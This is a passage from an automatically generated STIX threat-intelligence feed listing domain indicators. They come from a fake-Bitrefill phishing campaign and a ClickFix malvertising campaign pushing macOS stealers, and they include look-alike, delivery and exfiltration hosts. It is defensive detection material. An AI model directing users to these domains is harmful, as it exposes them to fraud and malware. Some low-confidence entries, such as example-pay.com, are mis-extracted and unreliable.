Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a96ded37-5e04-4fe7-b45a-fc05c018392d","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitruflli.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: retill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pa","pattern":"[domain-name:value = 'bitruflli.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a4ecc91-f4c9-49ef-9de0-f3890d8c6787","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: rgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]co","pattern":"[domain-name:value = 'butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--decee817-9a17-4af8-a95d-237ed95c05fd","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: example-pay.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y’s main domain, as in pay.example.com . An address such as example-pay.com is a completely separate domain that anyone could register.","pattern":"[domain-name:value = 'example-pay.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--613f38b2-96d4-48af-a463-a1ab32a40ca7","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pay-bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefl","pattern":"[domain-name:value = 'pay-bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b171e76b-3c00-4a44-b1bb-cc5d7c3aa27b","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pay-bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: gifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]co","pattern":"[domain-name:value = 'pay-bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9023be3d-e56e-47bf-ae33-7a564fa4c292","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pay-bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: l[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]co","pattern":"[domain-name:value = 'pay-bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4ee7488-d160-49e7-aa08-7d91b19087bd","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pay-bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.","pattern":"[domain-name:value = 'pay-bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dad4f002-9de0-47cc-badc-3fca4d051e8e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pay-butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2","pattern":"[domain-name:value = 'pay-butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8326d27d-adfa-493c-bc15-a7c1f7265815","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitrefll-71a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-71a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7600ba3e-3d8b-4661-b071-268d7a66ea09","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitrefll-h2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn-","pattern":"[domain-name:value = 'xn--bitrefll-h2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86e89a24-3981-40ff-b46e-9d7f1945bb32","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitrefll-pay-kfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: itigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-pay-kfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--afb22a55-a3ad-4a22-8a65-35888bdbc530","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitrefll-pay-xfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitrei","pattern":"[domain-name:value = 'xn--bitrefll-pay-xfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05e78dd9-cb91-408d-9abf-cc0808f11ae6","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitrefll-q2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: .]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--b","pattern":"[domain-name:value = 'xn--bitrefll-q2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5c5f4f6-9e93-4a9e-8a51-9828135f2240","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitreill-cz9c.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pa","pattern":"[domain-name:value = 'xn--bitreill-cz9c.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e4e4c62-4495-4389-8483-bfafc8b24040","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--bitreill-pay-yq4f.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop th","pattern":"[domain-name:value = 'xn--bitreill-pay-yq4f.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1d1fab4-8a2b-4697-958e-e1452613c45a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--btrefill-l2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can d","pattern":"[domain-name:value = 'xn--btrefill-l2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2307b16a-4072-4ae3-a8a9-9e228018d322","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xn--pay-bitrefll-fgb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can do any harm. Malwarebytes Br","pattern":"[domain-name:value = 'xn--pay-bitrefll-fgb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--74c4afb0-238d-45fd-b8ee-4127bc88d0a5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: aforvm.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com;","pattern":"[domain-name:value = 'aforvm.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71171688-a437-42e6-b067-360785beec72","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: aidevmaster.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumb","pattern":"[domain-name:value = 'aidevmaster.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--759abb04-55d6-4106-9ec0-39acbfd6c50b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: alfredaps.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; co","pattern":"[domain-name:value = 'alfredaps.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b72921cf-64ba-455b-8a35-70e95e6d1d1b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: applediag.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub","pattern":"[domain-name:value = 'applediag.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62499377-28f9-4618-ad52-f646f1e8e604","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: arkypc.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; gro","pattern":"[domain-name:value = 'arkypc.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc6fa8b8-d1f5-447d-92cb-404222c08212","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: basequill9.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekm","pattern":"[domain-name:value = 'basequill9.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22d3a62b-a57e-4c94-9328-328df1a71b99","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: beaocnagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: aesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Dom","pattern":"[domain-name:value = 'beaocnagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0b99607d-f518-421e-b3d2-5157e941ca95","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bright-links.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]g","pattern":"[domain-name:value = 'bright-links.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fef42c8-47fe-4bfa-8ecc-c6ef1da578ed","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: broadwalkindia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.]com Teardown and deli","pattern":"[domain-name:value = 'broadwalkindia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ea276bb-0ff2-4a81-9482-f5067fdb5339","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: camaligsalvatrefoils.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com","pattern":"[domain-name:value = 'camaligsalvatrefoils.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--885f828d-da59-4435-9140-63fc52364baa","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: canvas-35.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery dom","pattern":"[domain-name:value = 'canvas-35.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--14db3f90-2655-4045-acdd-987555f5329a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cehamilton.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.","pattern":"[domain-name:value = 'cehamilton.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f33c4a41-1b80-4d22-9bc5-20284e8a9e15","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chatgpt-safepage.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsof","pattern":"[domain-name:value = 'chatgpt-safepage.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--497b4ca1-b14a-4759-ba24-5205085ae86a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cladesktop.gitlab.io","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ight-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]c","pattern":"[domain-name:value = 'cladesktop.gitlab.io']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2140e978-c212-40dc-99b8-d936858f94ab","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: claude-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-li","pattern":"[domain-name:value = 'claude-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d65f863-124c-4f7a-86e8-ab547a7e9e23","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: claud-tips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; mu","pattern":"[domain-name:value = 'claud-tips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5a4889b-e748-4bd7-b07f-c282e69c0886","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: r-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f9a8b61-945f-47b0-897c-2d3a31b29a91","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clean-disk-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" 